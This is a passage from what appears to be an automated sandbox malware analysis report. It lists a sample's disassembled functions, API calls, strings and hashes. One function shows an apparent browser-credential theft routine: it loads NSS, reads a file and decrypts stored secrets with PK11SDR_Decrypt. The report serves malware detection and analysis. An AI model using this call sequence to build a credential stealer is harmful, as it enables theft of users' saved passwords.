                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                                                                                                                                                                                                                                                                  Function 6C6355F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(user32,?,6C60E1A5), ref: 6C635606
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(gdi32,?,6C60E1A5), ref: 6C63560F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C635633
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C63563D
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C63566C
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C63567D
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C635696
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6356B2
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6356CB
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6356E4
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6356FD
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C635716
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C63572F
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C635748
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C635761
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C63577A
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C635793
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6357A8
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6357BD
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6357D5
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6357EA
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6357FF
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                  • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 914cfe4b4572d42e95c4d728ef762d2a5573dac5eb8b95a4ffe579fb717a2db4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a114312d1eab6c3c3a2e08aa082ea16a4d92e93be041af1a7d9ab09ee703649
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 914cfe4b4572d42e95c4d728ef762d2a5573dac5eb8b95a4ffe579fb717a2db4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 805175707113239BDB01DF369D849263AF8AB46385FB4A425AD66E3A01EF74C901CF6D
                                                                                                                                                                                                                                                                                                                                  Function 6C61CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C5E582D), ref: 6C61CC27
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C5E582D), ref: 6C61CC3D
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C64FE98,?,?,?,?,?,6C5E582D), ref: 6C61CC56
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C5E582D), ref: 6C61CC6C
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C5E582D), ref: 6C61CC82
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C5E582D), ref: 6C61CC98
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5E582D), ref: 6C61CCAE
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C61CCC4
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C61CCDA
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C61CCEC
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C61CCFE
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C61CD14
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C61CD82
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C61CD98
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C61CDAE
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C61CDC4
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C61CDDA
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C61CDF0
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C61CE06
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C61CE1C
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C61CE32
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C61CE48
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C61CE5E
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C61CE74
                                                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C61CE8A
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: strcmp
                                                                                                                                                                                                                                                                                                                                  • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 386ac7a8fd4bb2e3223c7063e8c4484f4e58a13e202dab475ccaa6303ac5c390
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d3b00b400cd3820691a1b9e34c779d37908027b9086f277c5eee8db38f294f62
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 386ac7a8fd4bb2e3223c7063e8c4484f4e58a13e202dab475ccaa6303ac5c390
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E85144D1E5D62572FB01312D6D21BEE2485EF5324BF14C436EE0BA1F80FA05961AC9AF
                                                                                                                                                                                                                                                                                                                                  Function 6C5E4470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5E4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C5E44B2,6C65E21C,6C65F7F8), ref: 6C5E473E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5E4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C5E474A
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C5E44BA
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C5E44D2
                                                                                                                                                                                                                                                                                                                                  • InitOnceExecuteOnce.KERNEL32(6C65F80C,6C5DF240,?,?), ref: 6C5E451A
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C5E455C
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 6C5E4592
                                                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(6C65F770), ref: 6C5E45A2
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000008), ref: 6C5E45AA
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000018), ref: 6C5E45BB
                                                                                                                                                                                                                                                                                                                                  • InitOnceExecuteOnce.KERNEL32(6C65F818,6C5DF240,?,?), ref: 6C5E4612
                                                                                                                                                                                                                                                                                                                                  • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C5E4636
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(user32.dll), ref: 6C5E4644
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C5E466D
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E469F
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E46AB
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E46B2
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E46B9
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E46C0
                                                                                                                                                                                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C5E46CD
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C5E46F1
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C5E46FD
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                                                                                                  • String ID: Gel$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1702738223-1815337822
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 496f2ac104e086c3632db3d72713949b9b9f942d51d471d36bbc694661b02aa3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 26d91c04bde3dd1768c0c5bb053ff436fe25d81af04362e04d96a29858b94683
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 496f2ac104e086c3632db3d72713949b9b9f942d51d471d36bbc694661b02aa3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB6148B0600344AFEB00DFA2DC85BA57BB8FF8A308FB4C559E5049B641D3B18955CF9A
                                                                                                                                                                                                                                                                                                                                  Function 6C61EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5E4A68), ref: 6C61945E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C619470
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C619482
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: __Init_thread_footer.LIBCMT ref: 6C61949F
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61EE60
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61EE6D
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61EE92
                                                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C61EEA5
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C61EEB4
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C61EEBB
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61EEC7
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C61EECF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61DE60: GetCurrentThreadId.KERNEL32 ref: 6C61DE73
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C5E4A68), ref: 6C61DE7B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C5E4A68), ref: 6C61DEB8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61DE60: free.MOZGLUE(00000000,?,6C5E4A68), ref: 6C61DEFE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C61DF38
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: GetCurrentProcess.KERNEL32(?,6C5D31A7), ref: 6C60CBF1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5D31A7), ref: 6C60CBFA
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61EF1E
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61EF2B
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61EF59
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61EFB0
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61EFBD
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61EFE1
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61EFF8
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C61F000
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6194EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C619508
                                                                                                                                                                                                                                                                                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C61F02F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C61F09B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C61F0AC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C61F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C61F0BE
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_stop, xrefs: 6C61EED7
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_pause, xrefs: 6C61F008
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                                                                                                                                                                                  • API String ID: 16519850-1833026159
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 22f3e534fbd88e51b9b2df107746291eae5c4f07bb97fa424bfc072b01131aa8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a13ffb26a3f1973b54319232e5d005993d13ad4160e9eb8ffef0263df8222efc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22f3e534fbd88e51b9b2df107746291eae5c4f07bb97fa424bfc072b01131aa8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D51F5357082109FDB00DB6AD4887AA7BB4EF8735AFB40529E91583F41D7758805CBAF
                                                                                                                                                                                                                                                                                                                                  Function 0040CA90 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 383filestringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NSS_Init.NSS3(00000000), ref: 0040CAA5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,007A0428,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
                                                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
                                                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
                                                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?,007A0560,00420B56), ref: 0040CBF7
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,007A04A0), ref: 0040CC1E
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?,007A0B30,00000000,?,00421550,00000000,?,00000000,00000000,?,0079D728,00000000,?,0042154C,00000000,?), ref: 0040CDA2
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,007A0CF0), ref: 0040CDB9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0079D648), ref: 0040C971
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: PK11_GetInternalKeySlot.NSS3 ref: 0040C98A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C9A5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C9EB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: PK11_FreeSlot.NSS3(?), ref: 0040CA61
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?,007A0CF0,00000000,?,00421554,00000000,?,00000000,0079D648), ref: 0040CE5A
